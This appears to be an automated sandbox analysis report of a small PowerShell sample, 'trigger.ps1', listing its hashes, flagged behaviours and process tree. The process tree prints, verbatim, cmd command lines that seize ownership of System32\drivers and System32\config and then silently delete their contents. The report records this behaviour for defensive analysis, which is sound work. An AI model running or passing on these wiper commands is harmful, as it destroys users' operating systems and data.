Analysis
- max time kernel: 2s
- max time network: 1s
- platform: windows7_x64
- resource: win7-20240708-en
- resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
- submitted: 13-08-2024 20:52
- Static task: static1
- Behavioral task: behavioral1
  - Sample: trigger.ps1
  - Resource: win7-20240708-en
  - 6 signatures
  - 150 seconds
General
- Target: trigger.ps1
- Size: 361B
- MD5: f027721d34b4dd5220b236a39b0f75a8
- SHA1: b31847f44624ca0c7a53cd9a01f187bad6c4e88c
- SHA256: c0979852c32530744818450613b30e9bb81ee684239d189034ed3cee80fb5ae6
- SHA512: 74d9aaf78e525a90cff77a32aed86a4fa594be69bec74ea354f1b471818fbef42616ee5b9cbdea0faaafe2d2d7d5f6a9b4b97be0dc91e528837fa3f8ac281b48
Malware Config
Signatures
- Possible privilege escalation attempt (4 IoCs)
  Processes (pid, process):
  - 2724 takeown.exe
  - 2756 icacls.exe
  - 2800 takeown.exe
  - 2888 icacls.exe
- Modifies file permissions (1 TTP, 4 IoCs)
  Processes (pid, process):
  - 2724 takeown.exe
  - 2756 icacls.exe
  - 2800 takeown.exe
  - 2888 icacls.exe
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes (pid, process):
  - 2700 powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes (description, pid, process):
  - Token: SeDebugPrivilege, 2700 powershell.exe
  - Token: SeTakeOwnershipPrivilege, 2800 takeown.exe
- Suspicious use of WriteProcessMemory (18 IoCs)
  Processes (description, pid, process, target process; the report records each of the following six events three times):
  - PID 2700 wrote to memory of 2836: powershell.exe -> cmd.exe (3 entries)
  - PID 2836 wrote to memory of 2800: cmd.exe -> takeown.exe (3 entries)
  - PID 2836 wrote to memory of 2888: cmd.exe -> icacls.exe (3 entries)
  - PID 2700 wrote to memory of 2044: powershell.exe -> cmd.exe (3 entries)
  - PID 2044 wrote to memory of 2724: cmd.exe -> takeown.exe (3 entries)
  - PID 2044 wrote to memory of 2756: cmd.exe -> icacls.exe (3 entries)
Processes
- powershell.exe (PID 2700, depth 1)
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\trigger.ps1
  Signatures:
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  Children:
  - cmd.exe (PID 2836, depth 2)
    Path: C:\Windows\system32\cmd.exe
    Command line: "C:\Windows\system32\cmd.exe" /k "takeown /f C:\Windows\System32\drivers\* >nul && icacls C:\Windows\System32\drivers\* /grant everyone:(f) >nul && del /s /q C:\Windows\System32\drivers\* >nul 2>&1 && exit"
    Signatures:
    - Suspicious use of WriteProcessMemory
    Children:
    - takeown.exe (PID 2800, depth 3)
      Path: C:\Windows\system32\takeown.exe
      Command line: takeown /f C:\Windows\System32\drivers\*
      Signatures:
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    - icacls.exe (PID 2888, depth 3)
      Path: C:\Windows\system32\icacls.exe
      Command line: icacls C:\Windows\System32\drivers\* /grant everyone:(f)
      Signatures:
      - Possible privilege escalation attempt
      - Modifies file permissions
  - cmd.exe (PID 2044, depth 2)
    Path: C:\Windows\system32\cmd.exe
    Command line: "C:\Windows\system32\cmd.exe" /k "takeown /f C:\Windows\System32\config\* >nul && icacls C:\Windows\System32\config\* /grant everyone:(f) >nul && del /s /q C:\Windows\System32\config\* >nul 2>&1 && exit"
    Signatures:
    - Suspicious use of WriteProcessMemory
    Children:
    - takeown.exe (PID 2724, depth 3)
      Path: C:\Windows\system32\takeown.exe
      Command line: takeown /f C:\Windows\System32\config\*
      Signatures:
      - Possible privilege escalation attempt
      - Modifies file permissions
    - icacls.exe (PID 2756, depth 3)
      Path: C:\Windows\system32\icacls.exe
      Command line: icacls C:\Windows\System32\config\* /grant everyone:(f)
      Signatures:
      - Possible privilege escalation attempt
      - Modifies file permissions